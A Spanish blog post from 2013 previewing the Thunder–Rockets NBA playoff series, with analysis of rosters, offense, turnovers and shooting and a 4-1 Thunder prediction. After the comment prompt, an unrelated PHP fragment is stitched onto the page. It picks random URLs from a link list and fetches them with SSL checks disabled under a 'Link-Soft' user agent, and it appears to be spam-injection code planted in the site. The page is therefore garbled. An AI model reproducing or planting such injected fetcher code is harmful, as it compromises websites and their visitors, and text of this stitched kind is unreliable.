Previa Oklahoma City Thunder – Houston Rockets

21 de April de 2013 por Sancho88

Este año sí, los Rockets han conseguido amarrar un puesto entre los 8 mejores tras acariciarlo el año pasado. Después de una espiral de traspasos en los despachos de Daryl Morey (que ríete tú de las tardes aburridas de mi hermano quemando el modo Dinastía del 2K13), los texanos han dado un pasito más en la regeneración espiritual de la franquicia, y de ser considerados por todos como el agitador de ‘rookies’ en el pasado Draft, se han ganado en la cancha el derecho de luchar por sus sueños, aunque estos sean del todo inaccesibles. Dieron el ‘oro y el moro’ por Howard, al final llegó Harden, en el camino se encontraron joyitas como Greg Smith y Patrick Beberley, murió la hija de McHale, les criticamos por ir de ‘contenders’ y no sacar a Motiejunas y Jones, Royce White demostró el peligro de poner en un veinetañero inmaduro grandes fajos de billetes, e incluso el propio McHale acabó poniendo en la cancha a sus rookies y resulta que no eran tan malos. Estas cosas ocurren cuando 24 jugadores han desfilado yendo y viniendo a lo largo del año, cuando creas la ‘Beardsanity’ poniendo billetacos en los bolsillos pretenciosos de Harden y Lin y, claro está, cuando los enanos se vuelven gigantes y todo termina con más morbo del que empezó: James Harden contra los Thunder.

Esta frase resume la eliminatoria. Nos lo vamos a pasar bien seguro, porque el mejor ‘sexto hombre’ del año pasado este año es primera espada de la liga, y será interesantísimo ver cómo intenta apañárselas para quebrar la armadura de ‘Durántula’ y compañía. Si los Rockets tiraron en la última semana sus opciones de pasar a segunda ronda en un hipotético duelo contra los Spurs (tras perder 3 de sus últimos 4 partidos, con ‘Angolazo’ incluido contra los Suns), los Thunder tienen que estructurar mucho mejor que la pasada temporada su camino hacia el anillo. Es evidente que Miami iba mucho más descansado a las eliminatorias del año pasado, y que los Thunder se montaron un ‘thriller’ importante contra Lakers y Spurs. Pues bien, a partir de ahora tienen el deber de resolver por la vía rápida. A su aplastante superioridad física sobre el resto de equipos de la NBA ahora tienen que añadir cabeza y experiencia. Tienen que regular energías. Scott Brooks lo sabe, y por eso en el tramo final de la regular se inventó a un Reggie Jackson superlativo, e incluso dio minutos a futuros ‘cracks’ muy maltratados por su persona como Jeremy Lamb y Perry Jones. Esta tendencia tiene que continuar en primera ronda. El 4-0 es una posibilidad, pero algo sacará el barbudo en el Toyota Center.

 Claves de la eliminatoria:

  • Todos al ataque: Si algo les gusta de verdad a los Thunder y a los Rockets es jugar al ataque. Tanto la pareja Lin & Harden, como la formada por Westbrook & Durant aman jugar rápido, y por eso sus equipos son segundos y terceros, respectivamente, en puntos anotados. Eso sí, los Rockets tienen el dudoso honor de ser el tercer equipo más ‘goleado’ de la liga, sólo por detrás de los desastrosos Bobcats y de los paupérrimos Kings.
  • ¿Colega, dónde está mi cartera?: Cuando tienes en tu equipo a Lin o Westbrook, te lo vas a pasar en grande viendo cómo se juegan los pases y las asistencias, pero pueden llegar a desesperarte por su mala cabeza. Se suelen dejar la pelota en manos de los rivales, y eso provoca que sus equipos sean ‘Top 5’ en pérdidas de balón. De ahí le vienen a los Rockets tantos disgustos en puntos recibidos. Harden, de hecho, pierde casi 4 veces el balón por partido, y esto era algo que no sabíamos aún de él. Su rol de líder lo tendrá que pulir en este aspecto, en el cual ha vuelto a ser ‘rookie’ por una temporada. Seguro que el año que viene mejora esto, pero de momento Oklahoma ya sabe dónde tiene que buscarle las cosquillas al ‘barbas’.
  • Los porcentajes de Oklahoma: Segundos en tiros de campo, terceros en triples y primeros en tiros libres con un escalofriante 82% de acierto. Cuando te pica la ‘Durántula’ no hay nada que hacer. Si hasta el propio Ibaka se ha metido al oficio de meter triples, con Durant, Kevin Martin y Sefolosha subiendo del 40% de acierto y Westbrook alimentándoles hasta 8 veces por partido. Ojo porque este Westbrook es una versión mejoradísima de sí mismo.
  • A rezar lo que se sepan: Pues eso, para que la cosa no acabe por la vía rápida, McHale tendrá que inventar. Y mucho. Houston tiene la baza Chandler Parsons. Este chaval será el brazo ejecutor de los Rockets cuando todos rodeen a Harden. Y es que los ‘Cohetes’ también tienen su particular ‘Big Three’; pero esto no será suficiente cuando Durant se ponga en modo ‘Dios On’ en el último cuarto y le dé por cascarse 20 puntos y cosas de ésas que le gusta hacer al chaval.

Pronóstico: 4-1 Thunder.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>